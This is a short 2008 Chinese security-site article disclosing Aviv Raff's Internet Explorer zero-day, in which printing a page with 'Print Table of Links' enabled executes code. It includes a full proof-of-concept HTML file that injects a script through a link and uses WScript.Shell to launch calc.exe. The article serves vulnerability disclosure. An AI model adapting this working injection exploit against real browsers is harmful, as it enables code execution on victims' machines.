用户名: 密码: 验证码: 注册           网站地图 高级搜索 RSS订阅 收藏本站
您的位置:毒霸首页>安全防护>安全技巧>

Aviv Raff的IE0day(图)

[ 来源: | 更新日期:2008-5-16 07:14:50 | 评论 0 条 | 我要投稿 ]

  如果启用了 "Print Table of Links",在打印一个网页的时候,能够导致执行任意代码,当然VISTA上UAC可以拦截它 :)

  重现:

  1.下面这个地方打上勾

  

  2.把下面代码保存成HTML,用IE打开,打印之,calc.exe会弹出。 (也可以直接访问http://raffon.net/research/ms/ie/print/linksrce.html)

  <html>

  <body>

  Print me with table of links to execute calc.exe

  <a href="http://www.bla.com?x=b<script defer >var x=new ActiveXObject('WScript.Shell');x.Run('calc.exe');</script>a.c<u>o</u>m"></a>

  <script>window.print();</script>

  </body>

  </html>

  这个漏洞大牛蛙他们据说当时很快就找出来了,应该也有很多别的同学找到了吧。

 


Tags:HTML,script,Print,WScript,UAC,calc,Aviv,Raff,exe,Links
责任编辑:
您的评论
用户名:新注册) 密码: 匿名评论 [所有评论]

·用户发表意见仅代表其个人意见,并且承担一切因发表内容引起的纠纷和责任
·本站管理人员有权在不通知用户的情况下删除不符合规定的评论信息或留做证据
·请客观的评价您所看到的资讯,提倡就事论事,杜绝漫骂和人身攻击等不文明行为